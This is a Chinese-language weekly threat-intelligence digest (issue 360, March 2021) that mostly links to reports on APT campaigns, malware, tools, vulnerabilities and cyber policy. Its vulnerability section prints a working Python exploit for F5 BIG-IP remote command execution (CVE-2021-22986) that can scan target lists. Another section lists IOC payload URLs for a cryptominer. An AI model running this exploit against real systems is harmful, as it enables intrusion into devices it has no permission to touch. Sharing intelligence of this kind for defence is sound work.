今日威胁情报2021/3/19-22(第360期)

  • A+
所属分类:安全新闻

今日威胁情报2021/3/19-22(第360期)

祝愿各位老哥身体健康


高级威胁分析
今日威胁情报2021/3/19-22(第360期)


1、Lazarus Attack Activities Targeting Japan (VSingle/ValeforBeta),老油条了,样本C2多

https://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html


2、11个0day的未知组织攻击活动。这水坑的样子,像极了XXX

今日威胁情报2021/3/19-22(第360期)


https://googleprojectzero.blogspot.com/2021/03/in-wild-series-october-2020-0-day.html


3、卡巴斯基ICS CERT发布了一份报告,其中提供了有关2020年ICS工程和集成领域威胁格局的详细信息。

https://ics-cert.kaspersky.com/reports/2021/03/17/threat-landscape-for-the-ics-engineering-and-integration-sector-2020/


4、CISA发布了一个新工具,该工具可在受到威胁的本地企业环境中检测与SolarWinds黑客相关的恶意活动

https://us-cert.cisa.gov/ncas/alerts/aa21-077a

https://github.com/cisagov/CHIRP/blob/main/README.md


5、新的macOS恶意软件XcodeSpy通过EggShell后门攻击Xcode开发人员,这算是供应链攻击之前?

https://labs.sentinelone.com/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/

技术分享
今日威胁情报2021/3/19-22(第360期)


1、OSINT 俄罗斯在黑海的舰队分布与分析

今日威胁情报2021/3/19-22(第360期)

https://russianfleetanalysis.blogspot.com/2021/03/russian-forces-in-mediterranean-wk112021.html


2、CVE-2021-22986(F5 BIG-IP RCE)挖矿软件XMrig  IOC

1er Payload:http://118.107.43.174/upload/files/run.shhttp://118.107.43.174/upload/files/xmrig.tar.gz
2do Payload:http://124.158.4.235:8080/docs/nexusa.txthttp://136.243.19.213:8885/docs/config.jsonhttp://222.122.47.27:2143/auth/java.exehttp://27.1.1.34:8080/docs/solr.sh
IPs origen:45.83.29.58222.108.2.2037.120.194.100176.222.34.116132.145.111.134173.82.240.245176.222.34.116173.237.207.45104.233.164.29139.162.186.12735.235.96.5353.96.235.3513.56.200.22834.82.84.22415.228.52.2545.56.89.14035.203.110.60159.89.150.4045.33.71.63119.236.147.8454.253.20.132157.175.47.2315.236.131.189223.75.252.90185.89.250.18747.75.102.144

https://pastebin.com/DbYKkMmg


3、隐私分享工具

https://github.com/nccgroup/solitude

https://research.nccgroup.com/2021/03/17/tool-release-solitude-a-privacy-analysis-tool/


4、APT团队如何利用隧道

今日威胁情报2021/3/19-22(第360期)

https://www.varonis.com/blog/nmap-reverse-proxies/


5、Finding Metasploit & Cobalt Strike URLs

https://isc.sans.edu/forums/diary/Video+Finding+Metasploit+Cobalt+Strike+URLs/27224/


6、DTLS服务器来放大攻击

https://www.bleepingcomputer.com/news/security/ddos-booters-now-abuse-dtls-servers-to-amplify-attacks/


漏洞相关
今日威胁情报2021/3/19-22(第360期)


1、HW漏洞RCE-Exploit-in-BIG-IP

import requestsimport jsonimport argparseimport reimport jsonimport timefrom requests.packages.urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)
t = int(time.time())
def poc_1(target_url, command): print(target_url) headers = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0', 'Content-Type': 'application/json', 'X-F5-Auth-Token': '', 'Authorization': 'Basic YWRtaW46QVNhc1M=' }
data = json.dumps({'command': 'run' , 'utilCmdArgs': '-c ' + command}) # proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} check_url = target_url + '/mgmt/tm/util/bash' try: r = requests.post(url=check_url, data=data, headers=headers, verify=False, timeout=20) if r.status_code == 200 and 'commandResult' in r.text: default = json.loads(r.text) display = default['commandResult'] save_file(target_url, t) print('[+] vulnerable {0}'.format(target_url)) print('$ > {0}'.format(display)) else: print('[-] Not vulnerable') except Exception as e: print('url dead {0}'.format(target_url))
def save_file(target_url, t): output_name = 'Output_{0}.txt'.format(t) f = open(output_name, 'a') f.write(target_url + 'n') f.close()
def format_url(url): try: if url[:4] != "http": url = "https://" + url url = url.strip() return url except Exception as e: print('URL Error {0}'.format(url))
def main(): parser = argparse.ArgumentParser("f5 rce poc") parser.add_argument('-u', '--url', type=str, help=' URL ') parser.add_argument('-f', '--file', type=str, help=' File List ') parser.add_argument('-c', '--command', type=str, default="id", help=' execute commands ') args = parser.parse_args()
url = args.url file = args.file command = args.command


if not url is None: target_url = format_url(url) poc_1(target_url, command) elif file != '': for url_link in open(file, 'r', encoding='utf-8'): if url_link.strip() != '': url_path = format_url(url_link.strip()) poc_1(url_path, command) else: sys.exit(0)
if __name__ == '__main__': main()

今日威胁情报2021/3/19-22(第360期)

https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP


2、值得收藏的漏洞合集,从GitHub汇总了1,481个漏洞/ 1day的漏洞,可满足您所有的BlueTeam,RedTeam

https://vxug.fakedoma.in/tmp/Exploits/


3、xterm RCE,这个牛逼不

https://cvepremium.circl.lu/cve/CVE-2021-27135


4、Apache OFBiz中的RCE漏洞

https://seclists.org/oss-sec/2021/q1/255


5、unit42发现Microsoft,Adobe和Apple产品中的15个新漏洞

https://unit42.paloaltonetworks.com/15-new-vulnerabilities/


网络战与网络情报
今日威胁情报2021/3/19-22(第360期)


1、report

https://www.sri.ro/assets/files/publicatii/buletin-cyber-sem-1-2021.pdf


2、英国针对中俄,SAS 外国情报监控

https://www.telegraph.co.uk/politics/2021/03/20/sas-takes-fight-meddling-russians/


3、开源软件可以在北约的网络防御中发挥关键作用,从情报共享到情报体系化建设。

https://natoassociation.ca/open-source-software-can-play-a-key-role-in-natos-cyber-defences/


4、俄罗斯国民认罪共谋将恶意软件引入美国公司的计算机网络

今日威胁情报2021/3/19-22(第360期)

https://www.justice.gov/opa/pr/russian-national-pleads-guilty-conspiracy-introduce-malware-us-company-s-computer-network


5、论文

今日威胁情报2021/3/19-22(第360期)

https://academic.oup.com/jogss/article-abstract/3/4/402/5092710


6、欧盟网络安全局(ENISA)发布了新指南,以便利国家电信安全部门报告安全事件。

今日威胁情报2021/3/19-22(第360期)

https://www.enisa.europa.eu/news/enisa-news/when-how-to-report-security-incidents


7、SolarWinds参议院听证会:安全管理员的五个安全防护要点

https://www.csoonline.com/article/3610693/the-solarwinds-senate-hearing-5-key-takeaways-for-security-admins.html


8、欧盟理事会总结了欧盟的网络安全战略。这个报告很重要,特别是欧盟最近对中俄有其他意见和看法。

https://www.consilium.europa.eu/en/press/press-releases/2021/03/22/cybersecurity-council-adopts-conclusions-on-the-eu-s-cybersecurity-strategy/

https://data.consilium.europa.eu/doc/document/ST-6722-2021-INIT/en/pdf



今日威胁情报2021/3/19-22(第360期)

今日威胁情报2021/3/19-22(第360期)

本文始发于微信公众号(ThreatPage全球威胁情报):今日威胁情报2021/3/19-22(第360期)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: